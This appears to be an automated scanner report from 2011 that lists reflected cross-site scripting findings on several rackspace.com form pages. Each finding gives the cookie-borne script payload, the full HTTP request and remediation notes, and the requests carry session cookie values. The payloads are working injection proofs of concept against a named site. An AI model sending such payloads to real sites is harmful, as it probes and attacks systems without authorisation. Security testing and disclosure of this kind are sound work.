The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54802"><script>alert(1)</script>920b026e857 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /forms/contactsales.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f854802"><script>alert(1)</script>920b026e857; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4290f"><script>alert(1)</script>133c509e646 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /forms/contactsales.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D4290f"><script>alert(1)</script>133c509e646; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7f5c"%3balert(1)//af1a8175718 was submitted in the chatslider cookie. This input was echoed as d7f5c";alert(1)//af1a8175718 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/contactsales.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dd7f5c"%3balert(1)//af1a8175718; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5786"><script>alert(1)</script>4172314091f was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /forms/contactsalesconfirmation.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8c5786"><script>alert(1)</script>4172314091f; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b92f"%3balert(1)//f0e690efb61 was submitted in the IS_UASrackuid cookie. This input was echoed as 7b92f";alert(1)//f0e690efb61 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/contactsalesconfirmation.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f87b92f"%3balert(1)//f0e690efb61; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:52:55 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 34045
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c197a"><script>alert(1)</script>206871140ef was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /forms/contactsalesconfirmation.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dc197a"><script>alert(1)</script>206871140ef; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaca7"%3balert(1)//0ed5bec6a4 was submitted in the chatslider cookie. This input was echoed as aaca7";alert(1)//0ed5bec6a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/contactsalesconfirmation.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Daaca7"%3balert(1)//0ed5bec6a4; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12115"><script>alert(1)</script>a330925b86 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /forms/logorequest.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f812115"><script>alert(1)</script>a330925b86; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba7f6"%3balert(1)//17cf15cfc was submitted in the IS_UASrackuid cookie. This input was echoed as ba7f6";alert(1)//17cf15cfc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/logorequest.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8ba7f6"%3balert(1)//17cf15cfc; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:52:58 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 37253
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc898"%3balert(1)//194a6baafc4 was submitted in the chatslider cookie. This input was echoed as bc898";alert(1)//194a6baafc4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/logorequest.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dbc898"%3balert(1)//194a6baafc4; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c65a"><script>alert(1)</script>a727f401d10 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /forms/logorequest.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D8c65a"><script>alert(1)</script>a727f401d10; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
